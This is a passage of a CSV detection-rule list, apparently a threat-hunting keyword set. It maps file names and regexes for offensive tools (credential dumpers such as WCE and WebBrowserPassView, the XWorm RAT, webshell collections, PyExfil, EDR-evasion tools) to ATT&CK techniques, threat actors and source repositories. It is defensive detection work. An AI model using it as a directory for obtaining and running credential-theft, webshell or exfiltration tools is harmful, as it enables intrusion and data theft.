Access","https://www.kali.org/tools/wce/","1","0","N/A","N/A","8","4","N/A","N/A","N/A","N/A","19663" "*\wce-beta.zip*",".{0,1000}\\wce\-beta\.zip.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","APT27 - Turla - FIN5 - GALLIUM - APT22 - FIN6 - Tick - APT40 - APT39 - ","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","N/A","8","4","N/A","N/A","N/A","N/A","19664" "*\wcreddump.py*",".{0,1000}\\wcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). 
Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","19665" "*\WDExclusion.dll*",".{0,1000}\\WDExclusion\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19666" "*\WDExclusion.pdb*",".{0,1000}\\WDExclusion\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19667" "*\wdextract.cpp*",".{0,1000}\\wdextract\.cpp.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","19668" "*\wdextract.sln*",".{0,1000}\\wdextract\.sln.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","19669" 
"*\wdextract.vcxproj*",".{0,1000}\\wdextract\.vcxproj.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","19670" "*\wdextract32.exe*",".{0,1000}\\wdextract32\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","19671" "*\wdextract64.exe*",".{0,1000}\\wdextract64\.exe.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","19672" "*\wdigest.py*",".{0,1000}\\wdigest\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19673" "*\WdigestOffsets.csv*",".{0,1000}\\WdigestOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense 
Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","19674" "*\web_delivery.py*",".{0,1000}\\web_delivery\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19675" "*\webauthn-inject.js*",".{0,1000}\\webauthn\-inject\.js.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","19676" "*\WebBrowserPassView.cfg*",".{0,1000}\\WebBrowserPassView\.cfg.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. 
as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19677" "*\WebBrowserPassView.chm*",".{0,1000}\\WebBrowserPassView\.chm.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19678" "*\WebBrowserPassView_lng.ini*",".{0,1000}\\WebBrowserPassView_lng\.ini.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. 
as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19679" "*\webdav.py*",".{0,1000}\\webdav\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19680" "*\WeblogicRCE.exe*",".{0,1000}\\WeblogicRCE\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19681" "*\webpassview.exe*",".{0,1000}\\webpassview\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19682" "*\Webremote TorCT Client.exe*",".{0,1000}\\Webremote\sTorCT\sClient\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19683" "*\Webshell_Generate-1.1.jar*",".{0,1000}\\Webshell_Generate\-1\.1\.jar.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19684" "*\webshell-123.php*",".{0,1000}\\webshell\-123\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19685" "*\webshell-cnseay02-1.php*",".{0,1000}\\webshell\-cnseay02\-1\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19686" "*\webshell-cnseay-x.php*",".{0,1000}\\webshell\-cnseay\-x\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - 
observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19687" "*\WebShellKillerTool.zip*",".{0,1000}\\WebShellKillerTool\.zip.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19688" "*\webtrufflehog.log*",".{0,1000}\\webtrufflehog\.log.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","N/A","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","19689" "*\webtrufflehog-main*",".{0,1000}\\webtrufflehog\-main.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","N/A","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","19690" "*\WfpTokenDup.exe*",".{0,1000}\\WfpTokenDup\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19695" 
"*\whatlicense-main\*",".{0,1000}\\whatlicense\-main\\.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","19696" "*\WhereObjectCommand.cs",".{0,1000}\\WhereObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19697" "*\WheresMyImplant*",".{0,1000}\\WheresMyImplant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","19698" "*\while_dll_ms*",".{0,1000}\\while_dll_ms.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - 
T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","19699" "*\Whisker.exe*",".{0,1000}\\Whisker\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19700" "*\Whisker.exe*",".{0,1000}\\Whisker\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19701" "*\Whisker.exe*",".{0,1000}\\Whisker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19702" "*\Whisker.exe*",".{0,1000}\\Whisker\.exe.{0,1000}","offensive_tool_keyword","Whisker","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19703" "*\Whisker.pdb*",".{0,1000}\\Whisker\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19704" "*\Whisker.pdb*",".{0,1000}\\Whisker\.pdb.{0,1000}","offensive_tool_keyword","Whisker","executables for penetration testing Windows Active Directory 
environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19705" "*\White_Rabbit.txt*",".{0,1000}\\White_Rabbit\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19706" "*\whoami.py*",".{0,1000}\\whoami\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19707" "*\whoami_juicy.txt*",".{0,1000}\\whoami_juicy\.txt.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","19708" "*\WifiKeys.dll*",".{0,1000}\\WifiKeys\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - 
TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19709" "*\WifiKeys.pdb*",".{0,1000}\\WifiKeys\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19710" "*\WIFIPasswords.txt*",".{0,1000}\\WIFIPasswords\.txt.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","19711" "*\wifiPayload\client.py*",".{0,1000}\\wifiPayload\\client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","19712" "*\wifiPayload\server.py*",".{0,1000}\\wifiPayload\\server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","19713" "*\WinAudit.exe*",".{0,1000}\\WinAudit\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 
- T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","19715" "*\WinBruteLogon.zip*",".{0,1000}\\WinBruteLogon\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","19716" "*\windapsearch.py*",".{0,1000}\\windapsearch\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","19717" "*\WindDef_WebInstall.hta*",".{0,1000}\\WindDef_WebInstall\.hta.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","19718" "*\windows\\temp\\sec.tmp*",".{0,1000}\\windows\\\\temp\\\\sec\.tmp.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","19719" "*\windows\all\winpwnage*",".{0,1000}\\windows\\all\\winpwnage.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","19721" "*\windows\creddump*",".{0,1000}\\windows\\creddump.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - 
T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","19722" "*\Windows\CurrentVersion\Uninstall\SQLC2AgentPS*",".{0,1000}\\Windows\\CurrentVersion\\Uninstall\\SQLC2AgentPS.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
